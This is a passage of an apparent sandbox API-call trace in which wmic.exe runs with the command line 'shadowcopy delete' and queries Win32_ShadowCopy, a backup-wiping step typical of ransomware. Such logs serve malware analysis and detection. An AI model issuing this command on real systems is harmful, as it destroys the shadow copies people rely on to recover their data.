DesiredAccess=0x28, TokenHandle=0x8ff758 | out: TokenHandle=0x8ff758*=0x158) returned 1 [0115.670] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x8ff754 | out: TokenInformation=0x0, ReturnLength=0x8ff754) returned 0 [0115.670] GetTokenInformation (in: TokenHandle=0x158, TokenInformationClass=0x3, TokenInformation=0xb53b20, TokenInformationLength=0x118, ReturnLength=0x8ff754 | out: TokenInformation=0xb53b20, ReturnLength=0x8ff754) returned 1 [0115.670] AdjustTokenPrivileges (in: TokenHandle=0x158, DisableAllPrivileges=0, NewState=0xb53b20*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0115.670] CloseHandle (hObject=0x158) returned 1 [0115.670] SetThreadUILanguage (LangId=0x0) returned 0x409 [0115.677] _vsnwprintf (in: _Buffer=0xb53bb0, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x8ff6e0 | out: _Buffer="ms_409") returned 6 [0115.677] GetComputerNameW (in: lpBuffer=0xb53bf8, nSize=0x8ff744 | out: lpBuffer="LHNIWSJ", nSize=0x8ff744) returned 1 [0115.677] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.677] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.677] ResolveDelayLoadedAPI () returned 0x74d5c5f0 [0115.677] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x8ff758 | out: lpNameBuffer=0x0, nSize=0x8ff758) returned 0x0 [0115.679] GetLastError () returned 0xea [0115.679] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0xb53c38, nSize=0x8ff758 | out: lpNameBuffer="LHNIWSJ\\CIiHmnxMn6Ps", nSize=0x8ff758) returned 0x1 [0115.679] lstrlenW (lpString="") returned 0 [0115.679] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.679] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0115.681] lstrlenW (lpString=".") returned 1 [0115.681] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2=".", cchCount2=1) returned 3 [0115.681] lstrlenW (lpString="LOCALHOST") returned 9 [0115.681] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LOCALHOST", cchCount2=9) returned 1 [0115.681] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.681] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.681] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="LHNIWSJ", cchCount2=7) returned 2 [0115.681] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.681] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.681] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.681] lstrlenW (lpString="LHNIWSJ") returned 7 [0115.681] ResolveDelayLoadedAPI () returned 0x77bb9840 [0115.685] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.685] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.685] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.685] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.685] SysStringLen (param_1="IMPERSONATE") returned 0xb [0115.685] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.685] SysStringLen (param_1="IMPERSONATE") returned 0xb [0115.685] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.685] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.685] SysStringLen (param_1="IMPERSONATE") returned 0xb [0115.685] SysStringLen (param_1="DELEGATE") returned 0x8 [0115.685] SysStringLen (param_1="IDENTIFY") returned 0x8 [0115.685] SysStringLen (param_1="DELEGATE") returned 0x8 [0115.685] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.685] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0115.685] SysStringLen (param_1="DELEGATE") returned 0x8 [0115.685] SysStringLen (param_1="NONE") returned 0x4 [0115.685] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.685] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.685] SysStringLen (param_1="NONE") returned 0x4 [0115.686] SysStringLen (param_1="CONNECT") returned 0x7 [0115.686] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.686] SysStringLen (param_1="CALL") returned 0x4 [0115.686] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.686] SysStringLen (param_1="CALL") returned 0x4 [0115.686] SysStringLen (param_1="CONNECT") returned 0x7 [0115.686] SysStringLen (param_1="PKT") returned 0x3 [0115.686] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.687] SysStringLen (param_1="PKT") returned 0x3 [0115.687] SysStringLen (param_1="NONE") returned 0x4 [0115.687] SysStringLen (param_1="NONE") returned 0x4 [0115.687] SysStringLen (param_1="PKT") returned 0x3 [0115.687] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.687] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.687] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.687] SysStringLen (param_1="NONE") returned 0x4 [0115.687] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.687] SysStringLen (param_1="PKT") returned 0x3 [0115.687] SysStringLen (param_1="PKT") returned 0x3 [0115.687] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.687] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0115.687] SysStringLen (param_1="DEFAULT") returned 0x7 [0115.687] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0115.687] SysStringLen (param_1="PKT") returned 0x3 [0115.687] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0115.687] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.687] SysStringLen (param_1="PKTINTEGRITY") returned 0xc [0115.687] SysStringLen (param_1="PKTPRIVACY") returned 0xa [0115.687] GetSystemDirectoryW (in: lpBuffer=0xb52a50, uSize=0x105 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0115.688] SysStringLen (param_1="C:\\Windows\\system32") returned 0x13 [0115.688] SysStringLen (param_1="\\wbem\\") returned 0x6 [0115.688] SysStringByteLen (bstr="C:\\Windows\\system32\\wbem\\") returned 0x32 [0115.688] SysStringLen (param_1="C:\\Windows\\system32\\wbem\\") returned 0x19 [0115.688] SysStringLen (param_1="XSL-Mappings.xml") returned 0x10 [0115.688] GetCurrentThreadId () returned 0x8d4 [0115.688] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Wbem\\CIMOM", ulOptions=0x0, samDesired=0x1, phkResult=0x8ff268 | out: phkResult=0x8ff268*=0x164) returned 0x0 [0115.688] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging", lpReserved=0x0, lpType=0x0, lpData=0x8ff274, lpcbData=0x8ff270*=0x400 | out: lpType=0x0, lpData=0x8ff274*=0x30, lpcbData=0x8ff270*=0x4) returned 0x0 [0115.688] _wcsicmp (_String1="0", _String2="1") returned -1 [0115.688] _wcsicmp (_String1="0", _String2="2") returned -2 [0115.688] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x8ff270*=0x4 | out: lpType=0x0, lpData=0x0, lpcbData=0x8ff270*=0x42) returned 0x0 [0115.688] RegQueryValueExW (in: hKey=0x164, lpValueName="Logging Directory", lpReserved=0x0, lpType=0x0, lpData=0xb52c58, lpcbData=0x8ff270*=0x42 | out: lpType=0x0, lpData=0xb52c58*=0x25, lpcbData=0x8ff270*=0x42) returned 0x0 [0115.688] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0115.689] lstrlenW (lpString="%systemroot%\\system32\\wbem\\Logs\\") returned 32 [0115.689] RegQueryValueExW (in: hKey=0x164, lpValueName="Log File Max Size", lpReserved=0x0, lpType=0x0, lpData=0x8ff274, lpcbData=0x8ff270*=0x400 | out: lpType=0x0, lpData=0x8ff274*=0x36, lpcbData=0x8ff270*=0xc) returned 0x0 [0115.689] _wtol (_String="65536") returned 65536 [0115.689] RegCloseKey (hKey=0x0) returned 0x6 [0115.689] CoCreateInstance (in: rclsid=0x1376a7c*(Data1=0xf6d90f12, Data2=0x9c73, Data3=0x11d3, Data4=([0]=0xb3, [1]=0x2e, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0xb, [7]=0xb4)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x1376a8c*(Data1=0x2933bf95, Data2=0x7b36, Data3=0x11d2, Data4=([0]=0xb2, [1]=0xe, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x98, [6]=0x3e, [7]=0x60)), ppv=0x8ff708 | out: ppv=0x8ff708*=0x10e45a8) returned 0x0 [0116.706] FreeThreadedDOMDocument:IXMLDOMDocument:Load (in: This=0x10e45a8, xmlSource=0x8ff688*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Windows\\system32\\wbem\\XSL-Mappings.xml", varVal2=0x0), isSuccessful=0x8ff6ec | out: isSuccessful=0x8ff6ec*=0xffff) returned 0x0 [0117.863] FreeThreadedDOMDocument:IXMLDOMDocument:get_documentElement (in: This=0x10e45a8, DOMElement=0x8ff700 | out: DOMElement=0x8ff700) returned 0x0 [0117.871] SysStringLen (param_1="VALUE") returned 0x5 [0117.871] SysStringLen (param_1="TABLE") returned 0x5 [0117.871] SysStringLen (param_1="TABLE") returned 0x5 [0117.871] SysStringLen (param_1="VALUE") returned 0x5 [0117.871] SysStringLen (param_1="LIST") returned 0x4 [0117.871] SysStringLen (param_1="TABLE") returned 0x5 [0117.871] SysStringLen (param_1="RAWXML") returned 0x6 [0117.871] SysStringLen (param_1="TABLE") returned 0x5 [0117.872] SysStringLen (param_1="RAWXML") returned 0x6 [0117.872] SysStringLen (param_1="LIST") returned 0x4 [0117.872] SysStringLen (param_1="LIST") returned 0x4 [0117.872] SysStringLen (param_1="RAWXML") returned 0x6 [0117.872] SysStringLen (param_1="HTABLE") returned 0x6 [0117.872] SysStringLen (param_1="TABLE") returned 0x5 [0117.872] SysStringLen (param_1="HTABLE") returned 0x6 [0117.872] SysStringLen (param_1="LIST") returned 0x4 [0117.873] SysStringLen (param_1="HFORM") returned 0x5 [0117.873] SysStringLen (param_1="TABLE") returned 0x5 [0117.873] SysStringLen (param_1="HFORM") returned 0x5 [0117.873] SysStringLen (param_1="LIST") returned 0x4 [0117.873] SysStringLen (param_1="HFORM") returned 0x5 [0117.873] SysStringLen (param_1="HTABLE") returned 0x6 [0117.873] SysStringLen (param_1="XML") returned 0x3 [0117.873] SysStringLen (param_1="TABLE") returned 0x5 [0117.873] SysStringLen (param_1="XML") returned 0x3 [0117.873] SysStringLen (param_1="VALUE") returned 0x5 [0117.873] SysStringLen (param_1="VALUE") returned 0x5 [0117.873] SysStringLen (param_1="XML") returned 0x3 [0117.874] SysStringLen (param_1="MOF") returned 0x3 [0117.874] SysStringLen (param_1="TABLE") returned 0x5 [0117.874] SysStringLen (param_1="MOF") returned 0x3 [0117.874] SysStringLen (param_1="LIST") returned 0x4 [0117.874] SysStringLen (param_1="MOF") returned 0x3 [0117.874] SysStringLen (param_1="RAWXML") returned 0x6 [0117.874] SysStringLen (param_1="LIST") returned 0x4 [0117.874] SysStringLen (param_1="MOF") returned 0x3 [0117.874] SysStringLen (param_1="CSV") returned 0x3 [0117.874] SysStringLen (param_1="TABLE") returned 0x5 [0117.874] SysStringLen (param_1="CSV") returned 0x3 [0117.874] SysStringLen (param_1="LIST") returned 0x4 [0117.874] SysStringLen (param_1="CSV") returned 0x3 [0117.874] SysStringLen (param_1="HTABLE") returned 0x6 [0117.874] SysStringLen (param_1="CSV") returned 0x3 [0117.874] SysStringLen (param_1="HFORM") returned 0x5 [0117.875] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.875] SysStringLen (param_1="TABLE") returned 0x5 [0117.875] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.875] SysStringLen (param_1="VALUE") returned 0x5 [0117.875] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.875] SysStringLen (param_1="XML") returned 0x3 [0117.875] SysStringLen (param_1="XML") returned 0x3 [0117.875] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.876] SysStringLen (param_1="texttablewsys") returned 0xd [0117.876] SysStringLen (param_1="TABLE") returned 0x5 [0117.876] SysStringLen (param_1="texttablewsys") returned 0xd [0117.876] SysStringLen (param_1="XML") returned 0x3 [0117.876] SysStringLen (param_1="texttablewsys") returned 0xd [0117.876] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.876] SysStringLen (param_1="XML") returned 0x3 [0117.876] SysStringLen (param_1="texttablewsys") returned 0xd [0117.876] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.876] SysStringLen (param_1="TABLE") returned 0x5 [0117.876] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.876] SysStringLen (param_1="XML") returned 0x3 [0117.876] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.876] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.876] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.876] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.877] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.877] SysStringLen (param_1="TABLE") returned 0x5 [0117.877] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.877] SysStringLen (param_1="XML") returned 0x3 [0117.877] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.877] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.877] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.877] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.877] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.877] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.877] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.877] SysStringLen (param_1="TABLE") returned 0x5 [0117.877] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.877] SysStringLen (param_1="XML") returned 0x3 [0117.877] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.877] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.877] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.877] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.877] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.877] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.878] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0117.878] SysStringLen (param_1="TABLE") returned 0x5 [0117.878] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0117.878] SysStringLen (param_1="XML") returned 0x3 [0117.878] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0117.878] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.878] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0117.878] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.878] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0117.878] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.878] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.878] SysStringLen (param_1="wmiclitableformatnosys") returned 0x16 [0117.878] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0117.878] SysStringLen (param_1="TABLE") returned 0x5 [0117.878] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0117.878] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.879] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0117.879] SysStringLen (param_1="XML") returned 0x3 [0117.879] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0117.879] SysStringLen (param_1="texttablewsys") returned 0xd [0117.879] SysStringLen (param_1="XML") returned 0x3 [0117.879] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0117.879] SysStringLen (param_1="htable-sortby") returned 0xd [0117.879] SysStringLen (param_1="TABLE") returned 0x5 [0117.879] SysStringLen (param_1="htable-sortby") returned 0xd [0117.879] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.879] SysStringLen (param_1="htable-sortby") returned 0xd [0117.879] SysStringLen (param_1="XML") returned 0x3 [0117.879] SysStringLen (param_1="htable-sortby") returned 0xd [0117.879] SysStringLen (param_1="texttablewsys") returned 0xd [0117.879] SysStringLen (param_1="htable-sortby") returned 0xd [0117.879] SysStringLen (param_1="htable-sortby.xsl") returned 0x11 [0117.879] SysStringLen (param_1="XML") returned 0x3 [0117.879] SysStringLen (param_1="htable-sortby") returned 0xd [0117.880] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0117.880] SysStringLen (param_1="TABLE") returned 0x5 [0117.880] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0117.880] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.880] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0117.880] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.880] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0117.880] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.880] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.880] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0117.880] SysStringLen (param_1="wmiclimofformat") returned 0xf [0117.880] SysStringLen (param_1="TABLE") returned 0x5 [0117.880] SysStringLen (param_1="wmiclimofformat") returned 0xf [0117.880] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.880] SysStringLen (param_1="wmiclimofformat") returned 0xf [0117.880] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.880] SysStringLen (param_1="wmiclimofformat") returned 0xf [0117.880] SysStringLen (param_1="wmiclitableformat") returned 0x11 [0117.880] SysStringLen (param_1="wmiclimofformat") returned 0xf [0117.881] SysStringLen (param_1="wmiclimofformat.xsl") returned 0x13 [0117.881] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.881] SysStringLen (param_1="wmiclimofformat") returned 0xf [0117.881] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0117.881] SysStringLen (param_1="TABLE") returned 0x5 [0117.881] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0117.881] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.881] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0117.881] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.881] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0117.881] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.881] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.881] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0117.882] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0117.882] SysStringLen (param_1="TABLE") returned 0x5 [0117.882] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0117.882] SysStringLen (param_1="texttablewsys.xsl") returned 0x11 [0117.882] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0117.882] SysStringLen (param_1="wmiclitableformat.xsl") returned 0x15 [0117.882] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0117.882] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.882] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0117.882] SysStringLen (param_1="wmiclivalueformat.xsl") returned 0x15 [0117.882] SysStringLen (param_1="wmiclitableformatnosys.xsl") returned 0x1a [0117.882] SysStringLen (param_1="wmiclivalueformat") returned 0x11 [0117.882] FreeThreadedDOMDocument:IUnknown:Release (This=0x10e45a8) returned 0x0 [0117.882] GetCommandLineW () returned="\"C:\\Windows\\system32\\wbem\\wmic.exe\" shadowcopy delete" [0117.883] memcpy_s (in: _Destination=0xb58108, _DestinationSize=0x6e, _Source=0xc015d8, _SourceSize=0x6a | out: _Destination=0xb58108) returned 0x0 [0117.883] GetLocalTime (in: lpSystemTime=0x8ff6b0 | out: lpSystemTime=0x8ff6b0*(wYear=0x7e2, wMonth=0x7, wDayOfWeek=0x4, wDay=0x5, wHour=0x17, wMinute=0x2e, wSecond=0x5, wMilliseconds=0x5a)) [0117.883] _vsnwprintf (in: _Buffer=0xb58180, _BufferCount=0x3f, _Format="%.2d-%.2d-%.4dT%.2d:%.2d:%.2d", _ArgList=0x8ff690 | out: _Buffer="07-05-2018T23:46:05") returned 19 [0117.883] lstrlenW (lpString=" shadowcopy delete") returned 18 [0117.883] lstrlenW (lpString=" shadowcopy delete") returned 18 [0117.883] lstrlenW (lpString=" shadowcopy delete") returned 18 [0117.883] lstrlenW (lpString=" shadowcopy delete") returned 18 [0117.883] lstrlenW (lpString=" shadowcopy delete") returned 18 [0117.883] lstrlenW (lpString=" shadowcopy delete") returned 18 [0117.883] lstrlenW (lpString="shadowcopy") returned 10 [0117.883] _wcsicmp (_String1="shadowcopy", _String2="\"NULL\"") returned 81 [0117.883] lstrlenW (lpString=" shadowcopy delete") returned 18 [0117.883] lstrlenW (lpString="delete") returned 6 [0117.883] _wcsicmp (_String1="delete", _String2="\"NULL\"") returned 66 [0117.883] memmove_s (in: _Destination=0xb58208, _DestinationSize=0x4, _Source=0xb50598, _SourceSize=0x4 | out: _Destination=0xb58208) returned 0x0 [0117.883] lstrlenW (lpString="QUIT") returned 4 [0117.883] lstrlenW (lpString="shadowcopy") returned 10 [0117.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="QUIT", cchCount2=4) returned 3 [0117.884] lstrlenW (lpString="EXIT") returned 4 [0117.884] lstrlenW (lpString="shadowcopy") returned 10 [0117.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="EXIT", cchCount2=4) returned 3 [0117.884] WbemLocator:IUnknown:AddRef (This=0xc071c0) returned 0x2 [0117.884] lstrlenW (lpString="/") returned 1 [0117.884] lstrlenW (lpString="shadowcopy") returned 10 [0117.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="/", cchCount2=1) returned 3 [0117.884] lstrlenW (lpString="-") returned 1 [0117.884] lstrlenW (lpString="shadowcopy") returned 10 [0117.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="-", cchCount2=1) returned 3 [0117.884] lstrlenW (lpString="CLASS") returned 5 [0117.884] lstrlenW (lpString="shadowcopy") returned 10 [0117.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CLASS", cchCount2=5) returned 3 [0117.884] lstrlenW (lpString="PATH") returned 4 [0117.884] lstrlenW (lpString="shadowcopy") returned 10 [0117.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="PATH", cchCount2=4) returned 3 [0117.884] lstrlenW (lpString="CONTEXT") returned 7 [0117.884] lstrlenW (lpString="shadowcopy") returned 10 [0117.884] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="shadowcopy", cchCount1=10, lpString2="CONTEXT", cchCount2=7) returned 3 [0117.884] lstrlenW (lpString="shadowcopy") returned 10 [0117.884] lstrlenW (lpString="shadowcopy") returned 10 [0117.884] GetCurrentThreadId () returned 0x8d4 [0117.884] ??0CHString@@QAE@XZ () returned 0x8ff604 [0117.884] WbemLocator:IWbemLocator:ConnectServer (in: This=0xc071c0, strNetworkResource="root\\cli", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x13b9540 | out: ppNamespace=0x13b9540*=0xc30c00) returned 0x0 [0119.728] CoSetProxyBlanket (pProxy=0xc30c00, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0119.728] ??1CHString@@QAE@XZ () returned 0x73be6430 [0119.728] GetCurrentThreadId () returned 0x8d4 [0119.728] ??0CHString@@QAE@XZ () returned 0x8ff5ac [0119.728] SysStringLen (param_1="root\\cli") returned 0x8 [0119.728] SysStringLen (param_1="\\") returned 0x1 [0119.729] SysStringLen (param_1="root\\cli\\") returned 0x9 [0119.729] SysStringLen (param_1="ms_409") returned 0x6 [0119.729] WbemLocator:IWbemLocator:ConnectServer (in: This=0xc071c0, strNetworkResource="root\\cli\\ms_409", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x13b9544 | out: ppNamespace=0x13b9544*=0xc30cf0) returned 0x0 [0119.827] ??1CHString@@QAE@XZ () returned 0x73be6430 [0119.827] GetCurrentThreadId () returned 0x8d4 [0119.827] ??0CHString@@QAE@XZ () returned 0x8ff608 [0119.827] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0119.827] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1371478, cbMultiByte=-1, lpWideCharStr=0xb59908, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0119.828] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0119.828] SysStringLen (param_1="shadowcopy") returned 0xa [0119.828] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='shadowcopy") returned 0x26 [0119.828] SysStringLen (param_1="'") returned 0x1 [0119.828] IWbemServices:GetObject (in: This=0xc30c00, strObjectPath="MSFT_CliAlias.FriendlyName='shadowcopy'", lFlags=0, pCtx=0x0, ppObject=0x8ff604*=0x0, ppCallResult=0x0 | out: ppObject=0x8ff604*=0xc4e928, ppCallResult=0x0) returned 0x0 [0119.933] IWbemClassObject:Get (in: This=0xc4e928, wszName="Target", lFlags=0, pVal=0x8ff5dc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8ff5dc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Select * from Win32_ShadowCopy", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.933] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0119.933] lstrlenW (lpString="Select * from Win32_ShadowCopy") returned 30 [0119.933] IWbemClassObject:Get (in: This=0xc4e928, wszName="PWhere", lFlags=0, pVal=0x8ff5dc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8ff5dc*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=" Where ID = '#'", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0119.934] lstrlenW (lpString=" Where ID = '#'") returned 15 [0119.934] lstrlenW (lpString=" Where ID = '#'") returned 15 [0119.934] IWbemClassObject:Get (in: This=0xc4e928, wszName="Connection", lFlags=0, pVal=0x8ff5dc*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x8ff5dc*(varType=0xd, wReserved1=0x0, wReserved2=0x0, 